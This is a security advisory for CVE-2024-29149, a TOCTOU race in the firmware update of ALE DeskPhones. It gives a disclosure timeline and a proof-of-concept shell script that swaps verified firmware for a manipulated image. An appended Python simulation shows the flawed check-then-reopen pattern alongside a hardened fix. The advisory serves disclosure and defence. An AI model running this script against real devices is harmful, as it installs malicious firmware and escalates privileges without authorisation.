-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Advisory ID: SYSS-2024-010
Product: Alcatel-Lucent ALE DeskPhones
Manufacturer: ALE International, ALE USA Inc
Affected Version(s): Please see the manufacturer note[4]
Tested Version(s): Firmware Versions:
                   86x8_NOE-R300.1.40.07.4140
                   86x8_SIP-R200.1.01.10.728
                   86x8_NOE-R300.1.40.12.4180
Vulnerability Type: Time-of-check Time-of-use (TOCTOU) Race Condition (CWE-367)
Risk Level: Medium
Solution Status: Fixed
Manufacturer Notification: 2024-02-19
Solution Date: 2024-05-06
Public Disclosure: 2024-05-06
CVE Reference: CVE-2024-29149
Author of Advisory: Moritz Abrell, SySS GmbH

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

ALE DeskPhones are modern desk phones which are used for the operation
in enterprise environments.

The manufacturer describes the product as follows (see [1]):

"Innovative deskphones and digital phones, delivering rich
communications in sleek designs, are essential for hybrid work."

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

Due to a time-of-check time-of-use vulnerability, an authenticated
attacker is able to replace the verified firmware image with malicious
firmware during the update process of the phone.

This allows, e.g., for local privilege escalation.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

1. Download manipulated firmware to the "/tmp" directory of the phone
   with the "admin" (default user) access (e.g., via SSH or via USB
   debugging (UART)).

2. Download the following script to the phone and execute it.
   This script waits until the firmware verification of the original
   firmware is successful and then replaces it with the manipulated
   firmware:

#####################################
#!/bin/sh

# Name of the vendor's signature verification process as it appears in ps
PROC_NAME="upgrade_check --signature"

# Set once the verification process has been seen; empty until then
FLAG=""

while true
do
    if [ "$FLAG" ]
    then
        # Verification was seen earlier: wait for it to finish
        if [ "$(ps | grep "$PROC_NAME" | egrep -v 'grep')" ]
        then
            continue
        else
            # Time-of-check is over; swap the already verified image
            echo "[*] Process finished"
            cat /tmp/sip86x8P-manipulated > /tmp/sip86x8P
            echo "[+] Image overwritten"
            break
        fi
    fi

    # Verification not seen yet: poll until it starts
    if [ "$(ps | grep "$PROC_NAME" | egrep -v 'grep')" ]
    then
        echo "[*] Signature verification process found"
        FLAG="1"
    fi
done
#####################################

3. Afterward, the replaced and manipulated firmware will be installed.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

Update the devices according to the manufacturer note[4].

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2024-02-17: Vulnerability discovered
2024-02-19: Vulnerability reported to manufacturer
2024-02-19: Manufacturer confirmed reception
2024-03-04: Asked the manufacturer for status
2024-03-18: CVE-2024-29149 assigned and shared with the manufacturer
2024-03-25: Asked the manufacturer for status
2024-03-28: Update from the manufacturer: Case is still under investigation
2024-03-29: Update from the manufacturer: A fix proposal is made
2024-04-02: Asked the manufacturer for a proposed remediation timeline
2024-04-02: Update from the manufacturer: Manufacturer has reproduction issues
2024-04-02: Proposed a meeting to discuss technical details
2024-04-03: Video call with the manufacturer to discuss technical details
2024-04-02: Update from the manufacturer: Root cause has now been fully
            understood and a fix is under testing
            Manufacturer has questions about the details and timeline of
            the disclosure
2024-04-10: Video call with the manufacturer to discuss the disclosure
            timeline
2024-04-11: Disclosure timeline proposed and shared with the manufacturer
2024-05-06: Update from the manufacturer: A security advisory will be
            published today
2024-05-06: Manufacturer published a security advisory[4]
2024-05-07: Public disclosure
2024-07-12: Advisory updated with technical details
2024-07-12: Blog post published[5]

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] ALE DeskPhones product website
    https://www.al-enterprise.com/en/products/devices/ale-deskphones
[2] SySS Security Advisory SYSS-2024-010
    https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2024-010.txt
[3] SySS Responsible Disclosure Policy
    https://www.syss.de/en/responsible-disclosure-policy
[4] Security advisory published by the manufacturer
    https://www.al-enterprise.com/-/media/assets/internet/documents/n-to-s/sa-c0071-ed01.pdf
[5] Blog post:
    https://blog.syss.com/posts/voip-deskphone-firmware-security/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Moritz Abrell of SySS GmbH.

E-Mail: moritz.abrell@syss.de
Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Moritz_Abrell.asc
Key Fingerprint: 2927 7EB6 1A20 0679 79E9 87E6 AE0C 9BF8 F134 8B53

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of this security advisory is available on the SySS
website.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0
URL: http://creativecommons.org/licenses/by/3.0/deed.en

-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEKSd+thogBnl56Yfmrgyb+PE0i1MFAmZpQeEACgkQrgyb+PE0
i1NlgA//cqtYqeB3yJjf9VRoFeVeJnpA8saFdSTPMJIal2zLOLmrbjck9W4exh1M
Y+0m7m/+nu++mBjx/XILrpgml4ZGv94AFk20XG9EB+aD6FirCKd1m+B18Ik0J1Hl
WQisHFHx2rAuZMVzvVOXyw4m9C6zNlSE1TdJytLgtV4woWfNfZyj/Sf6F+9e0N4P
54Hi7qoyr8cctS5kcG+BXp993R30UbPDN8HbysQK0pUDateuahnXi4tDoVE02VbR
aL+UWkV9+YKtCvbhyQlR6LGl2CTRLrFEXhtUbSJlpk+tQ1ZL4/oB1fT6FFa3ofRb
EZHu8m5Y0fXHzLTVKDckDGFAAh4/LDJLQqQm5SGHBqGKkyiOdwDKbDrqUiQeeRnG
Uab78x94mKi5CvCVD6izCWuqtNAOI7qTepUYWer8VW7+1nIp16FphuLOi+SFtxP4
iCUGllPL5OxcLIsEM18slvphqcQcoG1XVghjXDLpSQjXh4YLsf3ADWpvi9YjFIOf
h/jau2KUFC6nA8Og3WAJKxrnxiMyOGQvrxJkbfSs+vrnA3mL2gFavpKidU4aXIlg
hu3PyB2KqXlaL8lRSBvz6eZIRwPM0lDPKvxwVwfCh0eLfN0dL5R6rZ116dMI7QAL
/aIzavuuirhHpnSSPNqcqbF4blXKQJMZjjdMvx7u5d/tuao0XC4=
=bYuD
-----END PGP SIGNATURE-----
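Added example (not part of the advisory above, and not ALE's or SySS's code): the following Python simulates the verify-then-reopen pattern behind the TOCTOU described in the Vulnerability Details section, next to a variant that verifies and installs the same bytes. Everything in it is constructed for illustration: the HMAC-SHA256 "signature" stands in for the vendor's real firmware signature scheme, the images and the staging file name are sample values, and the `between_check_and_use` hook is an assumed way to make the race deterministic rather than anything the phone's updater exposes.

```python
"""Simulated firmware installer: the verify-then-reopen race next to a
variant that installs exactly the bytes it verified.

Constructed example for this advisory; it does not model the phone's real
upgrade_check binary or its image format.
"""
import hashlib
import hmac
import os
import tempfile

# Stand-in for the vendor's firmware signing key (constructed). A real
# firmware verifier uses an asymmetric signature; HMAC-SHA256 is used here
# only so the example runs with the standard library alone.
SIGNING_KEY = b"constructed-example-signing-key"

GENUINE_IMAGE = b"GENUINE-FIRMWARE-IMAGE"        # constructed sample image
MALICIOUS_IMAGE = b"MANIPULATED-FIRMWARE-IMAGE"  # constructed sample image


def sign_image(image: bytes) -> bytes:
    """Vendor side: produce the signature shipped alongside an image."""
    return hmac.new(SIGNING_KEY, image, hashlib.sha256).digest()


def signature_ok(image: bytes, signature: bytes) -> bool:
    """Device side: constant-time comparison of the signature over IMAGE."""
    return hmac.compare_digest(sign_image(image), signature)


def install_vulnerable(path, signature, between_check_and_use=lambda: None):
    """Check the file at PATH, then re-open PATH to install it.

    The two opens are the time-of-check and the time-of-use; whoever can
    write PATH in between decides what actually gets installed.
    Returns the installed bytes.
    """
    with open(path, "rb") as f:
        if not signature_ok(f.read(), signature):
            raise ValueError("signature verification failed")
    between_check_and_use()      # the race window
    with open(path, "rb") as f:  # time-of-use trusts the path, not the bytes
        return f.read()


def install_hardened(path, signature, between_check_and_use=lambda: None):
    """Read once, verify those bytes, install exactly those bytes.

    Overwriting the staging file after the check no longer changes what is
    installed, because the path is never consulted again.
    Returns the installed bytes.
    """
    with open(path, "rb") as f:
        image = f.read()
    if not signature_ok(image, signature):
        raise ValueError("signature verification failed")
    between_check_and_use()      # same window, but nothing is re-read
    return image


def simulate_race(installer):
    """Run INSTALLER on a staging file that gets overwritten between the
    signature check and the install step; return what got installed."""
    signature = sign_image(GENUINE_IMAGE)
    with tempfile.TemporaryDirectory() as staging:
        path = os.path.join(staging, "sip86x8P")  # stand-in for /tmp/sip86x8P
        with open(path, "wb") as f:
            f.write(GENUINE_IMAGE)

        def overwrite_staged_image():
            with open(path, "wb") as f:  # truncate and rewrite the same file
                f.write(MALICIOUS_IMAGE)

        return installer(path, signature, overwrite_staged_image)


if __name__ == "__main__":
    print("vulnerable installer installs:", simulate_race(install_vulnerable))
    print("hardened installer installs:  ", simulate_race(install_hardened))
```

Two design points worth noting when applying this to a real updater. Keeping the same open descriptor across check and install is not a fix on its own: a shell redirection like the PoC's `cat ... > /tmp/sip86x8P` truncates and rewrites the existing file, so a second read through the original descriptor would also see the new contents. The safe shapes are either to verify and flash the same in-memory buffer (as above), or, where the image is too large to hold, to stage it somewhere the "admin" account cannot write and to recompute the digest over the bytes as they are actually written to flash, comparing it with the value the signature covered.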